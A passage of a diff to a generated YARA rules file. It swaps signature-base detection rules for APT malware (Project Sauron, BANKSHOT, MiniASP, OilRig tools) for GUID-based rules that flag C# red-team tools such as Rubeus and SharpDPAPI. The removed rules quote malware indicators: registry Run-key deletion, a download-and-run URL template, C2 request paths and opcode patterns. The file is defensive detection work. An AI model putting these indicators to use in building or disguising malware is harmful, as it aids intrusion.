-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M6 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_BYTAGE : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1aa6dd43-52ac-5321-9941-767833073c37"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L208-L226"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4f87ca2c-3ac1-5733-893e-79665b80ffc3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/KNIF/BYTAGE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1294-L1308"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "95ca9a0b2e71e7152d20a01d238e7362024c6dac6fc95ed2ebfa96dcbc8dbd40"
+		logic_hash = "faf0172ab464c4a19ce5ba4514f2a60ac4e78ce20be4fb4878a23e2980b6ea88"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3782b63d7f6f688a5ccb1b72be89a6a98bb722218c9f22402709af97a41973c8"
 
 	strings:
-		$s1 = "rseceng.dll" fullword wide
-		$s2 = "Remote Security Engine" fullword wide
-		$op0 = { 8b 0d d5 1d 00 00 85 c9 0f 8e a2 }
-		$op1 = { 80 75 6e 85 c0 79 6a 66 41 83 38 0a 75 63 0f b7 }
-		$op2 = { 80 75 29 85 c9 79 25 b9 01 }
+		$typelibguid0lo = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii wide
+		$typelibguid0up = "8E46BA56-E877-4DEC-BE1E-394CB1B5B9DE" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) ) and 1 of ( $op* ) ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Project_Sauron_Custom_M7 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Multios_Reverseshell : FILE
 {
 	meta:
-		description = "Detects malware from Project Sauron APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c5e83e1a-872d-53b3-a74a-b1a9b4a89168"
-		date = "2016-08-09"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/eFoP4A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_project_sauron_extras.yar#L228-L261"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f54bcb1a-b0cd-5988-bf1d-4fa6c012d6b9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/belane/MultiOS_ReverseShell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1310-L1324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d132ddeb1d26b035565d3707b73d401fb413315febe26ac291cb05bfeca7c41d"
+		logic_hash = "ae5a41fd66f058a8f89f6b9d488d7f4a845bf7829a1eb04f49c4e8e4c8db1cc0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6c8c93069831a1b60279d2b316fd36bffa0d4c407068dbef81b8e2fe8fd8e8cd"
-		hash2 = "7cc0bf547e78c8aaf408495ceef58fa706e6b5d44441fefdce09d9f06398c0ca"
 
 	strings:
-		$sx1 = "Default user" fullword wide
-		$sx2 = "Hincorrect header check" fullword ascii
-		$sa1 = "MSAOSSPC.dll" fullword ascii
-		$sa2 = "MSAOSSPC.DLL" fullword wide
-		$sa3 = "MSAOSSPC" fullword wide
-		$sa4 = "AOL Security Package" fullword wide
-		$sa5 = "AOL Security Package" fullword wide
-		$sa6 = "AOL Client for 32 bit platforms" fullword wide
-		$op0 = { 8b ce 5b e9 4b ff ff ff 55 8b ec 51 53 8b 5d 08 }
-		$op1 = { e8 0a fe ff ff 8b 4d 14 89 46 04 89 41 04 8b 45 }
-		$op2 = { e9 29 ff ff ff 83 7d fc 00 0f 84 cf 0a 00 00 8b }
-		$op3 = { 83 f8 0c 0f 85 3a 01 00 00 44 2b 41 6c 41 8b c9 }
-		$op4 = { 44 39 57 0c 0f 84 d6 0c 00 00 44 89 6f 18 45 89 }
-		$op5 = { c1 ed 02 83 c6 fe e9 68 fe ff ff 44 39 57 08 75 }
+		$typelibguid0lo = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii wide
+		$typelibguid0up = "DF0DD7A1-9F6B-4B0F-801E-E17E73B0801D" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( 3 of ( $s* ) and 3 of ( $op* ) ) or ( 1 of ( $sx* ) and 1 of ( $sa* ) ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_Email_Redirection_Spoofing_Feb25
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hidefromamsi : FILE
 {
 	meta:
-		description = "Detects redirect spoofing in embedded URLs. This technique is used by threat actors to obscure the actual destination of a link"
-		author = "Jonathan Peters (cod3nym)"
-		id = "bf3a2b06-4dc5-5f0f-bf1f-2bd6a1cc4a8d"
-		date = "2025-02-20"
-		modified = "2025-03-20"
-		reference = "https://any.run/cybersecurity-blog/cyber-attacks-january-2025/#fake-youtube-links-redirect-users-to-phishing-pages-11298"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/susp_email_redirection_spoofing.yar#L1-L19"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0fa1ce82-b662-5e18-a5da-8359c96cd6e9"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1326-L1340"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b196220b369c199a7e4d57cb5db18b32eb2565a6f9190929c5c01ac4fa04ac8"
-		hash = "c4eb35c1a1c10226bff9bb0c88ca516441208d193b4994eeb292a66e53a2cc04"
-		hash = "e3b8ea03a472348814c6ac81088234836e627a1878ec36e46ce62526e1390935"
-		logic_hash = "9a411317821751dc0873fe3163791115d1e19bc4d57119ed2ba513b444864032"
-		score = 70
+		logic_hash = "c4c06b8f40a38d5386cb49befd7705552b471e443188b6af1d85d7bd4277cc1c"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "Content-Transfer-Encoding:" ascii
-		$sa2 = "Subject:" ascii
-		$x = ".com%20%20%20%20%20%" ascii
+		$typelibguid0lo = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii wide
+		$typelibguid0up = "B91D2D44-794C-49B8-8A75-2FBEC3FE3FE3" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Hiddencobra_BANKSHOT_Gen : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnetavbypass_Master : FILE
 {
 	meta:
-		description = "Detects Hidden Cobra BANKSHOT trojan"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fbf9dd32-cb9a-51f2-bd03-0387fbf44baa"
-		date = "2017-12-26"
-		modified = "2022-06-10"
-		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_bankshot.yar#L11-L63"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4004271b-4fbe-58bb-9613-a077e76324b3"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/lockfale/DotNetAVBypass-Master"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1342-L1356"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db4d396736ab42942f1a11a819419410e388b011e8992ad187c2f484d637c99c"
+		logic_hash = "28446fae71b06f0418a5dd3cb6d6842dcc930313f7740704770b41f16ad0e7b5"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486"
-		hash2 = "8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247"
-		hash3 = "b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24"
-		hash4 = "daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75"
-		hash5 = "ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699"
-		hash6 = "d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff"
-		hash7 = "ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9"
-		hash8 = "3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6"
-		hash9 = "6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" fullword wide
-		$s2 = "rHTTP/1.1 200 Connection established" fullword wide
-		$s3 = "Proxy-Connection: keep-alive" fullword wide
-		$s4 = "\\msncf.dat" wide
-		$s5 = "msvcru32.bat" fullword ascii
-		$s6 = "reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"%s\" /f" fullword ascii
-		$s7 = "MXINFO.DLL" fullword ascii
-		$s8 = "usrvc32.bat" fullword ascii
-		$s9 = "ping -n 1 127.0.0.1" fullword ascii
-		$s10 = "%sd.e%sc \"%s > %s 2>&1\"" ascii fullword
-		$s11 = "DWS*.tmp" ascii fullword
-		$s12 = "CS*.tmp" fullword wide
-		$s13 = "WM*.tmp" fullword wide
-		$x1 = "CgpaipIddwspwe32Hnaehsdi" fullword ascii
-		$x2 = "RpiPmtiCdopIsgpao" fullword ascii
-		$x3 = "RpiLtnodlhOtgpcidgyA" fullword ascii
-		$x4 = "LatiQdgHtnrwpDbupci" fullword ascii
-		$x6 = "\\system32\\msncf.dat" ascii
-		$x7 = "GprthipgHpgktcpCigwSanowpgA" fullword ascii
-		$a1 = "live.dropbox.com" fullword ascii
-		$a2 = "tatadocomo.yahoo.com" fullword ascii
-		$a3 = "widgets.twimg.com" fullword ascii
-		$a4 = "history.paypal.com" fullword ascii
-		$a5 = "www.bitcoin.org" fullword ascii
-		$a6 = "web.whatsapp.com" fullword ascii
+		$typelibguid0lo = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii wide
+		$typelibguid0up = "4854C8DC-82B0-4162-86E0-A5BBCBC10240" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of ( $s* ) or 4 of ( $a* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Unauthorized_Proxy_Server_RAT
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdpapi : FILE
 {
 	meta:
-		description = "Detects Proxy Server RAT"
-		author = "US-CERT Code Analysis Team"
-		id = "378573e3-17a7-5862-aae5-a8e84102e237"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hiddencobra_bankshot.yar#L67-L92"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "1394323f-b336-548f-925c-c276d439e9eb"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/SharpDPAPI"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1358-L1374"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ede26272ddcb25dca2b44ff08b232f358078872f6cf76491b0fd8d65772c60d"
+		logic_hash = "5846d932bb8064a82e57f942d0c7a8feec4c8582bb2eac64be7cc662d60e6d6e"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "C74E289AD927E81D2A1A56BC73E394AB"
-		hash2 = "2950E3741D7AF69E0CA0C5013ABC4209"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3}
-		$s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3}
-		$s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3}
-		$s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3}
-		$s4 = {B91A7900008A140780F29A8810404975F4}
-		$s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F}
-		$s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3}
-		$s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC}
-		$s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24}
-		$s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523}
-		$s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0}
-		$s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7}
-		$s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541}
-		$s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05}
+		$typelibguid0lo = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii wide
+		$typelibguid0up = "5F026C27-F8E6-4052-B231-8451C6A73838" ascii wide
+		$typelibguid1lo = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii wide
+		$typelibguid1up = "2F00A05B-263D-4FCC-846B-DA82BD684603" ascii wide
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_Malware_Commentcrew_Miniasp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Telegra_Csharp_C2 : FILE
 {
 	meta:
-		description = "CommentCrew Malware MiniASP APT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a434012d-d13a-5061-a1d8-180d2c5828e8"
-		date = "2015-06-03"
-		modified = "2023-12-05"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_miniasp.yar#L2-L38"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "495a5f3e-cf05-5a66-b01c-8176ded88768"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/sf197/Telegra_Csharp_C2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1376-L1390"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f382dd802f0332c99b1d33cf1dcd99ba7fad344a381152ebadfb69bc74c4e58f"
+		logic_hash = "b931009110366712cc9d69a7cb7feaa7a02f7baa93bc3c3fbb76c4132554b10e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0af4360a5ae54d789a8814bf7791d5c77136d625"
-		hash1 = "777bf8def279942a25750feffc11d8a36cc0acf9"
-		hash2 = "173f20b126cb57fc8ab04d01ae223071e2345f97"
 
 	strings:
-		$x1 = "\\MiniAsp4\\Release\\MiniAsp.pdb" ascii
-		$x2 = "run http://%s/logo.png setup.exe" fullword ascii
-		$x3 = "d:\\command.txt" fullword ascii
-		$z1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR " ascii
-		$z2 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)" fullword ascii
-		$z3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC" ascii
-		$s1 = "http://%s/device_command.asp?device_id=%s&cv=%s&command=%s" fullword ascii
-		$s2 = "kill process error!" fullword ascii
-		$s3 = "kill process success!" fullword ascii
-		$s4 = "pickup command error!" fullword ascii
-		$s5 = "http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s" fullword ascii
-		$s6 = "no command" fullword ascii
-		$s7 = "software\\microsoft\\windows\\currentversion\\run" fullword ascii
-		$s8 = "command is null!" fullword ascii
-		$s9 = "pickup command Ok!" fullword ascii
-		$s10 = "http://%s/result_%s.htm" fullword ascii
+		$typelibguid0lo = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii wide
+		$typelibguid0up = "1D79FABC-2BA2-4604-A4B6-045027340C85" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) ) or ( all of ( $z* ) ) or ( 8 of ( $s* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Chafer_Mimikatz_Custom : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcompile : FILE
 {
 	meta:
-		description = "Detects Custom Mimikatz Version"
-		author = "Florian Roth (Nextron Systems) / Markus Neis"
-		id = "80f751c3-d7ca-5ff6-a905-38650e1c4ec5"
-		date = "2018-03-22"
-		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L11-L23"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c5e053c4-1c90-581a-a6c3-087b252254b2"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/SpiderLabs/SharpCompile"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1392-L1406"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d3b74be6d221592fb867bd9589f5e4b246a093bd276efa3515d9e948a38eda48"
+		logic_hash = "60ecb9a9fa90e096d6b5d830787989046f5f8441282f4d7a072c6d7435add42d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9709afeb76532566ee3029ecffc76df970a60813bcac863080cc952ad512b023"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\Users\\win7p\\Documents\\mi-back\\" ascii
+		$typelibguid0lo = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii wide
+		$typelibguid0up = "63F81B73-FF18-4A36-B095-FDCB4776DA4C" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Chafer_Exploit_Copyright_2017 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Carbuncle : FILE
 {
 	meta:
-		description = "Detects Oilrig Internet Server Extension with Copyright (C) 2017 Exploit"
-		author = "Markus Neis"
-		id = "f78ae4f5-0569-5fc8-ab25-ebe38afd9f3c"
-		date = "2018-03-22"
-		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L25-L43"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4a87882e-570b-5b40-a8e3-47ebac01d257"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/checkymander/Carbuncle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1408-L1422"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "53d3e735bc368de152f4f4058617bc2cc5574bc13777f743442ff2bfafe92791"
+		logic_hash = "3a5bd58ac42ed3a428d6f20f1956b5abe5dfd958e9768fb0e3916ee2672d9c55"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "cdac69caad8891c5e1b8eabe598c869674dee30af448ce4e801a90eb79973c66"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "test3 Internet Server Extension" fullword wide
-		$x2 = "Copyright (C) 2017 Exploit" fullword wide
-		$a1 = "popen() failed!" fullword ascii
-		$a2 = "cmd2cmd=" fullword ascii
+		$typelibguid0lo = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii wide
+		$typelibguid0up = "3F239B73-88AE-413B-B8C8-C01A35A0D92E" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and ( 1 of ( $x* ) or all of ( $a* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Chafer_Portscanner : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Ossfiletool : FILE
 {
 	meta:
-		description = "Detects Custom Portscanner used by Oilrig"
-		author = "Markus Neis"
-		id = "8db934c3-fb0d-5c87-9096-1ee8fb16f9a5"
-		date = "2018-03-22"
-		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L45-L59"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fa9aeae1-2aa5-51af-81e2-22a1b6fcda81"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/B1eed/OSSFileTool"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1424-L1438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6e0475a5c0fc8155359376113f88f3de080968388bd3ea60664a063540688faf"
+		logic_hash = "2158671f0372080a7f78a7c6804d8be6715953545e23733ef1db091b2d849f2f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "88274a68a6e07bdc53171641e7349d6d0c71670bd347f11dcc83306fe06656e9"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "C:\\Users\\RS01204N\\Documents\\" ascii
-		$x2 = "PortScanner /ip:google.com  /port:80 /t:500 /tout:2" fullword ascii
-		$x3 = "open ports of host/hosts" fullword ascii
+		$typelibguid0lo = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii wide
+		$typelibguid0up = "207ACA5D-DCD6-41FB-8465-58B39EFCDE8B" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Oilrig_Myrtille : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rubeus : FILE
 {
 	meta:
-		description = "Detects Oilrig Myrtille RDP Browser"
-		author = "Markus Neis"
-		id = "e742ab0c-0e21-569e-a100-e5082dc1d372"
-		date = "2018-03-22"
-		modified = "2022-12-21"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L61-L76"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "54638fe4-84b5-51a8-8c88-9c50ab09ff49"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/Rubeus"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1440-L1454"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "373115c0a3fbfe93435aca07cbac52c7649a77d8b7d6eda8af5ce4a1a42e53a6"
+		logic_hash = "b6c346bb0f6db20bd573c9a17d2b8110e6abd4fe3c51d7c717feefa2c517319b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "67945f2e65a4a53e2339bd361652c6663fe25060888f18e681418e313d1292ca"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "\\obj\\Release\\Myrtille.Services.pdb" ascii
-		$x2 = "Failed to notify rdp client process exit (MyrtilleAppPool down?), remote session {0} ({1})" fullword wide
-		$x3 = "Started rdp client process, remote session {0}" fullword wide
+		$typelibguid0lo = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii wide
+		$typelibguid0up = "658C8B7F-3664-4A95-9572-A3E5871DFC06" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Chafer_Packed_Mimikatz : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Simple_Loader : FILE
 {
 	meta:
-		description = "Detects Oilrig Packed Mimikatz also detected as Chafer_WSC_x64 by FR"
-		author = "Florian Roth (Nextron Systems) / Markus Neis"
-		id = "abd34c6a-7d99-5f52-be8e-a7d634d61255"
-		date = "2018-03-22"
-		modified = "2023-12-05"
-		reference = "https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018b.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig_chafer_mar18.yar#L78-L92"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "4c26aaf9-187d-5990-b956-1bbf630411f0"
+		date = "2020-12-13"
+		modified = "2023-04-06"
+		reference = "https://github.com/cribdragg3r/Simple-Loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L1456-L1470"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
